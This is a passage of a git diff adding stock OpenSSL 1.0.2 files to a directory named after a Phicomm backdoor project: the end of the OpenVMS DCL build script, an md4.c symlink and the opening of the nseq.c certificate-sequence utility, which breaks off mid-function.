+$   THEN
+$!
+$!    We Need A VAX C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable VAX C Runtime Library.
+!
+SYS$SHARE:VAXCRTL.EXE/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The VAXC Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A GNU C Option File.
+$!
+$ IF (COMPILER.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If We Already Have A GNU C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A GNU C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable C Runtime Library.
+!
+GNU_CC:[000000]GCCLIB/LIBRARY
+SYS$SHARE:VAXCRTL/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The GNU C Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A DEC C Option File.
+$!
+$ IF (COMPILER.EQS."DECC")
+$ THEN
+$!
+$!  Check To See If We Already Have A DEC C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    Figure Out If We Need An AXP Or A VAX Linker Option File.
+$!
+$     IF ARCH.EQS."VAX"
+$     THEN
+$!
+$!      We Need A DEC C Linker Option File For VAX.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable DEC C Runtime Library.
+!
+SYS$SHARE:DECC$SHR.EXE/SHARE
+$EOD
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Create The non-VAX Linker Option File.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File For non-VAX To Link Against 
+! The Sharable C Runtime Library.
+!
+SYS$SHARE:CMA$OPEN_LIB_SHR/SHARE
+SYS$SHARE:CMA$OPEN_RTL/SHARE
+$EOD
+$!
+$!    End The DEC C Option File Check.
+$!
+$     ENDIF
+$!
+$!  End The Option File Search.
+$!
+$   ENDIF
+$!
+$! End The DEC C Check.
+$!
+$ ENDIF
+$!
+$!  Tell The User What Linker Option File We Are Using.
+$!
+$ WRITE SYS$OUTPUT "Using Linker Option File ",OPT_FILE,"."	
+$!
+$! Time To RETURN.
+$!
+$ RETURN
+$!
+$! Check To See If We Have The Appropiate Libraries.
+$!
+$ LIB_CHECK:
+$!
+$! Look For The Library LIBCRYPTO.OLB.
+$!
+$ IF (F$SEARCH(CRYPTO_LIB).EQS."")
+$ THEN
+$!
+$!  Tell The User We Can't Find The LIBCRYPTO.OLB Library.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "Can't Find The Library ",CRYPTO_LIB,"."
+$   WRITE SYS$OUTPUT "We Can't Link Without It."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Since We Can't Link Without It, Exit.
+$!
+$   EXIT
+$!
+$! End The Crypto Library Check.
+$!
+$ ENDIF
+$!
+$! Look For The Library LIBSSL.OLB.
+$!
+$ IF (F$SEARCH(SSL_LIB).EQS."")
+$ THEN
+$!
+$!  Tell The User We Can't Find The LIBSSL.OLB Library.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "Can't Find The Library ",SSL_LIB,"."
+$   WRITE SYS$OUTPUT "Some Of The Test Programs Need To Link To It."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Since We Can't Link Without It, Exit.
+$!
+$   EXIT
+$!
+$! End The SSL Library Check.
+$!
+$ ENDIF
+$!
+$! Time To Return.
+$!
+$ RETURN
+$!
+$! Check The User's Options.
+$!
+$ CHECK_OPTIONS:
+$!
+$! Check To See If P1 Is Blank.
+$!
+$ IF (P1.EQS."NODEBUG")
+$ THEN
+$!
+$!  P1 Is NODEBUG, So Compile Without Debugger Information.
+$!
+$   DEBUGGER  = "NODEBUG"
+$   LINKMAP = "NOMAP"
+$   TRACEBACK = "NOTRACEBACK" 
+$   GCC_OPTIMIZE = "OPTIMIZE"
+$   CC_OPTIMIZE = "OPTIMIZE"
+$   WRITE SYS$OUTPUT "No Debugger Information Will Be Produced During Compile."
+$   WRITE SYS$OUTPUT "Compiling With Compiler Optimization."
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Check To See If We Are To Compile With Debugger Information.
+$!
+$   IF (P1.EQS."DEBUG")
+$   THEN
+$!
+$!    Compile With Debugger Information.
+$!
+$     DEBUGGER  = "DEBUG"
+$     LINKMAP = "MAP"
+$     TRACEBACK = "TRACEBACK"
+$     GCC_OPTIMIZE = "NOOPTIMIZE"
+$     CC_OPTIMIZE = "NOOPTIMIZE"
+$     WRITE SYS$OUTPUT "Debugger Information Will Be Produced During Compile."
+$     WRITE SYS$OUTPUT "Compiling Without Compiler Optimization."
+$   ELSE
+$!
+$!    Tell The User Entered An Invalid Option.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P1," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    DEBUG    :  Compile With The Debugger Information."
+$     WRITE SYS$OUTPUT "    NODEBUG  :  Compile Without The Debugger Information."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P1 Check.
+$!
+$ ENDIF
+$!
+$! Check P6 (POINTER_SIZE).
+$!
+$ IF (P6 .NES. "") .AND. (ARCH .NES. "VAX")
+$ THEN
+$!
+$   IF (P6 .EQS. "32")
+$   THEN
+$     POINTER_SIZE = " /POINTER_SIZE=32"
+$   ELSE
+$     POINTER_SIZE = F$EDIT( P6, "COLLAPSE, UPCASE")
+$     IF ((POINTER_SIZE .EQS. "64") .OR. -
+       (POINTER_SIZE .EQS. "64=") .OR. -
+       (POINTER_SIZE .EQS. "64=ARGV"))
+$     THEN
+$       ARCHD = ARCH+ "_64"
+$       LIB32 = ""
+$       IF (F$EXTRACT( 2, 1, POINTER_SIZE) .EQS. "=")
+$       THEN
+$!        Explicit user choice: "64" or "64=ARGV".
+$         IF (POINTER_SIZE .EQS. "64=") THEN POINTER_SIZE = "64"
+$       ELSE
+$         SET NOON
+$         DEFINE /USER_MODE SYS$OUTPUT NL:
+$         DEFINE /USER_MODE SYS$ERROR NL:
+$         CC /NOLIST /NOOBJECT /POINTER_SIZE=64=ARGV NL:
+$         IF ($STATUS .AND. %X0FFF0000) .EQ. %X00030000
+$         THEN
+$           ! If we got here, it means DCL complained like this:
+$           ! %DCL-W-NOVALU, value not allowed - remove value specification
+$           !  \64=\
+$           !
+$           ! If the compiler was run, logicals defined in /USER would
+$           ! have been deassigned automatically.  However, when DCL
+$           ! complains, they aren't, so we do it here (it might be
+$           ! unnecessary, but just in case there will be another error
+$           ! message further on that we don't want to miss)
+$           DEASSIGN /USER_MODE SYS$ERROR
+$           DEASSIGN /USER_MODE SYS$OUTPUT
+$         ELSE
+$           POINTER_SIZE = POINTER_SIZE + "=ARGV"
+$         ENDIF
+$         SET ON
+$       ENDIF
+$       POINTER_SIZE = " /POINTER_SIZE=''POINTER_SIZE'"
+$!
+$     ELSE
+$!
+$!      Tell The User Entered An Invalid Option.
+$!
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", P6, -
+         " Is Invalid.  The Valid Options Are:"
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT -
+         "    """"  :  Compile with default (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    32  :  Compile with 32-bit (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    64       :  Compile with 64-bit (long) pointers (auto ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=      :  Compile with 64-bit (long) pointers (no ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=ARGV  :  Compile with 64-bit (long) pointers (ARGV)."
+$       WRITE SYS$OUTPUT ""
+$! 
+$!      Time To EXIT.
+$!
+$       EXIT
+$!
+$     ENDIF
+$!
+$   ENDIF
+$!
+$! End The P6 (POINTER_SIZE) Check.
+$!
+$ ENDIF
+$!
+$! Set basic C compiler /INCLUDE directories.
+$!
+$ CC_INCLUDES = "SYS$DISK:[-],SYS$DISK:[-.CRYPTO]"
+$!
+$! Check To See If P2 Is Blank.
+$!
+$ IF (P2.EQS."")
+$ THEN
+$!
+$!  O.K., The User Didn't Specify A Compiler, Let's Try To
+$!  Find Out Which One To Use.
+$!
+$!  Check To See If We Have GNU C.
+$!
+$   IF (F$TRNLNM("GNU_CC").NES."")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     P2 = "GNUC"
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!  Check To See If We Have VAXC Or DECC.
+$!
+$     IF (ARCH.NES."VAX").OR.(F$TRNLNM("DECC$CC_DEFAULT").NES."")
+$     THEN 
+$!
+$!      Looks Like DECC, Set To Use DECC.
+$!
+$       P2 = "DECC"
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Looks Like VAXC, Set To Use VAXC.
+$!
+$       P2 = "VAXC"
+$!
+$!    End The VAXC Compiler Check.
+$!
+$     ENDIF
+$!
+$!  End The DECC & VAXC Compiler Check.
+$!
+$   ENDIF
+$!
+$!  End The Compiler Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Have A Option For P3.
+$!
+$ IF (P3.EQS."")
+$ THEN
+$!
+$!  Find out what socket library we have available
+$!
+$   IF F$PARSE("SOCKETSHR:") .NES. ""
+$   THEN
+$!
+$!    We have SOCKETSHR, and it is my opinion that it's the best to use.
+$!
+$     P3 = "SOCKETSHR"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using SOCKETSHR for TCP/IP"
+$!
+$!    Else, let's look for something else
+$!
+$   ELSE
+$!
+$!    Like UCX (the reason to do this before Multinet is that the UCX
+$!    emulation is easier to use...)
+$!
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. "" -
+	 .OR. F$PARSE("SYS$SHARE:UCX$IPC_SHR.EXE") .NES. "" -
+	 .OR. F$PARSE("SYS$LIBRARY:UCX$IPC.OLB") .NES. ""
+$     THEN
+$!
+$!	Last resort: a UCX or UCX-compatible library
+$!
+$	P3 = "UCX"
+$!
+$!      Tell the user
+$!
+$       WRITE SYS$OUTPUT "Using UCX or an emulation thereof for TCP/IP"
+$!
+$!	That was all...
+$!
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$!
+$! Set Up Initial CC Definitions, Possibly With User Ones
+$!
+$ CCDEFS = "MONOLITH"
+$ IF F$TYPE(USER_CCDEFS) .NES. "" THEN CCDEFS = CCDEFS + "," + USER_CCDEFS
+$ CCEXTRAFLAGS = ""
+$ IF F$TYPE(USER_CCFLAGS) .NES. "" THEN CCEXTRAFLAGS = USER_CCFLAGS
+$ CCDISABLEWARNINGS = "" !!! "MAYLOSEDATA3" !!! "LONGLONGTYPE,LONGLONGSUFX,FOUNDCR"
+$ IF F$TYPE(USER_CCDISABLEWARNINGS) .NES. ""
+$ THEN
+$     IF CCDISABLEWARNINGS .NES. THEN CCDISABLEWARNINGS = CCDISABLEWARNINGS + ","
+$     CCDISABLEWARNINGS = CCDISABLEWARNINGS + USER_CCDISABLEWARNINGS
+$ ENDIF
+$!
+$! Check To See If We Have A ZLIB Option.
+$!
+$ ZLIB = P7
+$ IF (ZLIB .NES. "")
+$ THEN
+$!
+$!  Check for expected ZLIB files.
+$!
+$   err = 0
+$   file1 = f$parse( "zlib.h", ZLIB, , , "SYNTAX_ONLY")
+$   if (f$search( file1) .eqs. "")
+$   then
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     WRITE SYS$OUTPUT "    Can't find header: ''file1'"
+$     err = 1
+$   endif
+$   file1 = f$parse( "A.;", ZLIB)- "A.;"
+$!
+$   file2 = f$parse( ZLIB, "libz.olb", , , "SYNTAX_ONLY")
+$   if (f$search( file2) .eqs. "")
+$   then
+$     if (err .eq. 0)
+$     then
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     endif
+$     WRITE SYS$OUTPUT "    Can't find library: ''file2'"
+$     WRITE SYS$OUTPUT ""
+$     err = err+ 2
+$   endif
+$   if (err .eq. 1)
+$   then
+$     WRITE SYS$OUTPUT ""
+$   endif
+$!
+$   if (err .ne. 0)
+$   then
+$     EXIT
+$   endif
+$!
+$   CCDEFS = """ZLIB=1"", "+ CCDEFS
+$   CC_INCLUDES = CC_INCLUDES+ ", "+ file1
+$   ZLIB_LIB = ", ''file2' /library"
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "ZLIB library spec: ", file2
+$!
+$! End The ZLIB Check.
+$!
+$ ENDIF
+$!
+$!  Check To See If The User Entered A Valid Parameter.
+$!
+$ IF (P2.EQS."VAXC").OR.(P2.EQS."DECC").OR.(P2.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If The User Wanted DECC.
+$!
+$   IF (P2.EQS."DECC")
+$   THEN
+$!
+$!    Looks Like DECC, Set To Use DECC.
+$!
+$     COMPILER = "DECC"
+$!
+$!    Tell The User We Are Using DECC.
+$!
+$     WRITE SYS$OUTPUT "Using DECC 'C' Compiler."
+$!
+$!    Use DECC...
+$!
+$     CC = "CC"
+$     IF ARCH.EQS."VAX" .AND. F$TRNLNM("DECC$CC_DEFAULT").NES."/DECC" -
+	 THEN CC = "CC/DECC"
+$     CC = CC + " /''CC_OPTIMIZE' /''DEBUGGER' /STANDARD=RELAXED"+ -
+       "''POINTER_SIZE' /NOLIST /PREFIX=ALL" + -
+       " /INCLUDE=(''CC_INCLUDES') " + CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_DECC_OPTIONS.OPT"
+$!
+$!  End DECC Check.
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use VAXC.
+$!
+$   IF (P2.EQS."VAXC")
+$   THEN
+$!
+$!    Looks Like VAXC, Set To Use VAXC.
+$!
+$     COMPILER = "VAXC"
+$!
+$!    Tell The User We Are Using VAX C.
+$     WRITE SYS$OUTPUT "Using VAXC 'C' Compiler."
+$!
+$!    Compile Using VAXC.
+$!
+$     CC = "CC"
+$     IF ARCH.NES."VAX"
+$     THEN
+$	WRITE SYS$OUTPUT "There is no VAX C on ''ARCH'!"
+$	EXIT
+$     ENDIF
+$     IF F$TRNLNM("DECC$CC_DEFAULT").EQS."/DECC" THEN CC = "CC/VAXC"
+$     CC = CC + "/''CC_OPTIMIZE'/''DEBUGGER'/NOLIST" + -
+	   "/INCLUDE=(''CC_INCLUDES')" + CCEXTRAFLAGS
+$     CCDEFS = CCDEFS + ",""VAXC"""
+$!
+$!    Define <sys> As SYS$COMMON:[SYSLIB]
+$!
+$     DEFINE/NOLOG SYS SYS$COMMON:[SYSLIB]
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_VAXC_OPTIONS.OPT"
+$!
+$!  End VAXC Check
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use GNU C.
+$!
+$   IF (P2.EQS."GNUC")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     COMPILER = "GNUC"
+$!
+$!    Tell The User We Are Using GNUC.
+$!
+$     WRITE SYS$OUTPUT "Using GNU 'C' Compiler."
+$!
+$!    Use GNU C...
+$!
+$     IF F$TYPE(GCC) .EQS. "" THEN GCC := GCC
+$     CC = GCC+"/NOCASE_HACK/''GCC_OPTIMIZE'/''DEBUGGER'/NOLIST" + -
+	   "/INCLUDE=(''CC_INCLUDES')" + CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_GNUC_OPTIONS.OPT"
+$!
+$!  End The GNU C Check.
+$!
+$   ENDIF
+$!
+$!  Set up default defines
+$!
+$   CCDEFS = """FLAT_INC=1""," + CCDEFS
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P2," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    VAXC  :  To Compile With VAX C."
+$   WRITE SYS$OUTPUT "    DECC  :  To Compile With DEC C."
+$   WRITE SYS$OUTPUT "    GNUC  :  To Compile With GNU C."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$ ENDIF
+$!
+$! Time to check the contents, and to make sure we get the correct library.
+$!
+$ IF P3.EQS."SOCKETSHR" .OR. P3.EQS."MULTINET" .OR. P3.EQS."UCX" -
+     .OR. P3.EQS."TCPIP" .OR. P3.EQS."NONE"
+$ THEN
+$!
+$!  Check to see if SOCKETSHR was chosen
+$!
+$   IF P3.EQS."SOCKETSHR"
+$   THEN
+$!
+$!    Set the library to use SOCKETSHR
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]SOCKETSHR_SHR.OPT /OPTIONS"
+$!
+$!    Done with SOCKETSHR
+$!
+$   ENDIF
+$!
+$!  Check to see if MULTINET was chosen
+$!
+$   IF P3.EQS."MULTINET"
+$   THEN
+$!
+$!    Set the library to use UCX emulation.
+$!
+$     P3 = "UCX"
+$!
+$!    Done with MULTINET
+$!
+$   ENDIF
+$!
+$!  Check to see if UCX was chosen
+$!
+$   IF P3.EQS."UCX"
+$   THEN
+$!
+$!    Set the library to use UCX.
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC.OPT /OPTIONS"
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. ""
+$     THEN
+$       TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC_LOG.OPT /OPTIONS"
+$     ELSE
+$       IF COMPILER .NES. "DECC" .AND. ARCH .EQS. "VAX" THEN -
+	  TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_VAXC.OPT /OPTIONS"
+$     ENDIF
+$!
+$!    Done with UCX
+$!
+$   ENDIF
+$!
+$!  Check to see if TCPIP (post UCX) was chosen
+$!
+$   IF P3.EQS."TCPIP"
+$   THEN
+$!
+$!    Set the library to use TCPIP.
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]TCPIP_SHR_DECC.OPT /OPTIONS"
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Check to see if NONE was chosen
+$!
+$   IF P3.EQS."NONE"
+$   THEN
+$!
+$!    Do not use TCPIP.
+$!
+$     TCPIP_LIB = ""
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Add TCP/IP type to CC definitions.
+$!
+$   CCDEFS = CCDEFS + ",TCPIP_TYPE_''P3'"
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "TCP/IP library spec: ", TCPIP_LIB- ","
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P3," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    SOCKETSHR  :  To link with SOCKETSHR TCP/IP library."
+$   WRITE SYS$OUTPUT "    UCX        :  To link with UCX TCP/IP library."
+$   WRITE SYS$OUTPUT "    TCPIP      :  To link with TCPIP (post UCX) TCP/IP library."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$!
+$!  Done with TCP/IP libraries
+$!
+$ ENDIF
+$!
+$! Finish up the definition of CC.
+$!
+$ IF COMPILER .EQS. "DECC"
+$ THEN
+$!  Not all compiler versions support MAYLOSEDATA3.
+$   OPT_TEST = "MAYLOSEDATA3"
+$   DEFINE /USER_MODE SYS$ERROR NL:
+$   DEFINE /USER_MODE SYS$OUTPUT NL:
+$   'CC' /NOCROSS_REFERENCE /NOLIST /NOOBJECT -
+      /WARNINGS = DISABLE = ('OPT_TEST', EMPTYFILE) NL:
+$   IF ($SEVERITY)
+$   THEN
+$     IF CCDISABLEWARNINGS .NES. "" THEN -
+        CCDISABLEWARNINGS = CCDISABLEWARNINGS+ ","
+$     CCDISABLEWARNINGS = CCDISABLEWARNINGS+ OPT_TEST
+$   ENDIF
+$   IF CCDISABLEWARNINGS .NES. ""
+$   THEN
+$     CCDISABLEWARNINGS = " /WARNING=(DISABLE=(" + CCDISABLEWARNINGS + "))"
+$   ENDIF
+$ ELSE
+$   CCDISABLEWARNINGS = ""
+$ ENDIF
+$ CC2 = CC + " /DEFINE=(" + CCDEFS + ",_POSIX_C_SOURCE)" + CCDISABLEWARNINGS
+$ CC = CC + " /DEFINE=(" + CCDEFS + ")" + CCDISABLEWARNINGS
+$!
+$! Show user the result
+$!
+$ WRITE/SYMBOL SYS$OUTPUT "Main Compiling Command: ",CC
+$!
+$! Special Threads For OpenVMS v7.1 Or Later
+$!
+$! Written By:  Richard Levitte
+$!              richard@levitte.org
+$!
+$!
+$! Check To See If We Have A Option For P4.
+$!
+$ IF (P4.EQS."")
+$ THEN
+$!
+$!  Get The Version Of VMS We Are Using.
+$!
+$   ISSEVEN :=
+$   TMP = F$ELEMENT(0,"-",F$EXTRACT(1,4,F$GETSYI("VERSION")))
+$   TMP = F$INTEGER(F$ELEMENT(0,".",TMP)+F$ELEMENT(1,".",TMP))
+$!
+$!  Check To See If The VMS Version Is v7.1 Or Later.
+$!
+$   IF (TMP.GE.71)
+$   THEN
+$!
+$!    We Have OpenVMS v7.1 Or Later, So Use The Special Threads.
+$!
+$     ISSEVEN := ,PTHREAD_USE_D4
+$!
+$!  End The VMS Version Check.
+$!
+$   ENDIF
+$!
+$! End The P4 Check.
+$!
+$ ENDIF
+$!
+$! Check if the user wanted to compile just a subset of all the programs.
+$!
+$ IF P5 .NES. ""
+$ THEN
+$   PROGRAMS = P5
+$ ENDIF
+$!
+$!  Time To RETURN...
+$!
+$ RETURN
+$!
+$ INITIALISE:
+$!
+$! Save old value of the logical name OPENSSL
+$!
+$ __SAVE_OPENSSL = F$TRNLNM("OPENSSL","LNM$PROCESS_TABLE")
+$!
+$! Save directory information
+$!
+$ __HERE = F$PARSE(F$PARSE("A.;",F$ENVIRONMENT("PROCEDURE"))-"A.;","[]A.;") - "A.;"
+$ __HERE = F$EDIT(__HERE,"UPCASE")
+$ __TOP = __HERE - "APPS]"
+$ __INCLUDE = __TOP + "INCLUDE.OPENSSL]"
+$!
+$! Set up the logical name OPENSSL to point at the include directory
+$!
+$ DEFINE OPENSSL /NOLOG '__INCLUDE'
+$!
+$! Done
+$!
+$ RETURN
+$!
+$ CLEANUP:
+$!
+$! Restore the saved logical name OPENSSL, if it had a value.
+$!
+$ if (f$type( __SAVE_OPENSSL) .nes. "")
+$ then
+$   IF __SAVE_OPENSSL .EQS. ""
+$   THEN
+$     DEASSIGN OPENSSL
+$   ELSE
+$     DEFINE /NOLOG OPENSSL '__SAVE_OPENSSL'
+$   ENDIF
+$ endif
+$!
+$! Close any open files.
+$!
+$ if (f$trnlnm( "objects", "LNM$PROCESS", 0, "SUPERVISOR") .nes. "") then -
+   close objects
+$!
+$! Done
+$!
+$ RETURN
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/md4.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/md4.c
new file mode 120000
index 0000000..7f457b2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/md4.c
@@ -0,0 +1 @@
+../crypto/md4/md4.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/nseq.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/nseq.c
new file mode 100644
index 0000000..c306738
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/nseq.c
@@ -0,0 +1,170 @@
+/* nseq.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/pem.h>
+#include <openssl/err.h>
+
+#undef PROG
+#define PROG nseq_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    char **args, *infile = NULL, *outfile = NULL;
+    BIO *in = NULL, *out = NULL;
+    int toseq = 0;
+    X509 *x509 = NULL;
+    NETSCAPE_CERT_SEQUENCE *seq = NULL;
+    int i, ret = 1;
+    int badarg = 0;
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+    ERR_load_crypto_strings();
+    args = argv + 1;
+    while (!badarg && *args && *args[0] == '-') {
+        if (!strcmp(*args, "-toseq"))
+            toseq = 1;
+        else if (!strcmp(*args, "-in")) {
+            if (args[1]) {
+                args++;
+                infile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-out")) {
+            if (args[1]) {
+                args++;
+                outfile = *args;
+            } else
+                badarg = 1;
+        } else
+            badarg = 1;
+        args++;
+    }
+
+    if (badarg) {
+        BIO_printf(bio_err, "Netscape certificate sequence utility\n");
+        BIO_printf(bio_err, "Usage nseq [options]\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-in file  input file\n");
+        BIO_printf(bio_err, "-out file output file\n");
+        BIO_printf(bio_err, "-toseq    output NS Sequence file\n");
+        OPENSSL_EXIT(1);
+    }
+
+    if (infile) {
+        if (!(in = BIO_new_file(infile, "r"))) {
+            BIO_printf(bio_err, "Can't open input file %s\n", infile);
+            goto end;
+        }
+    } else
+        in = BIO_new_fp(stdin, BIO_NOCLOSE);
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, "w"))) {
+            BIO_printf(bio_err, "Can't open output file %s\n", outfile);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+    if (toseq) {
+        seq = NETSCAPE_CERT_SEQUENCE_new();
+        seq->certs = sk_X509_new_null();
+        while ((x509 = PEM_read_bio_X509(in, NULL, NULL, NULL)))
+            sk_X509_push(seq->certs, x509);
+
+        if (!sk_X509_num(seq->certs)) {
+            BIO_printf(bio_err, "Error reading certs file %s\n", infile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        PEM_write_bio_NETSCAPE_CERT_SEQUENCE(out, seq);
+        ret = 0;
+        goto end;
+    }
+
+    if (!(seq = PEM_read_bio_NETSCAPE_CERT_SEQUENCE(in, NULL, NULL, NULL))) {
+        BIO_printf(bio_err, "Error reading sequence file %s\n", infile);
+        ERR_print_errors(bio_err);
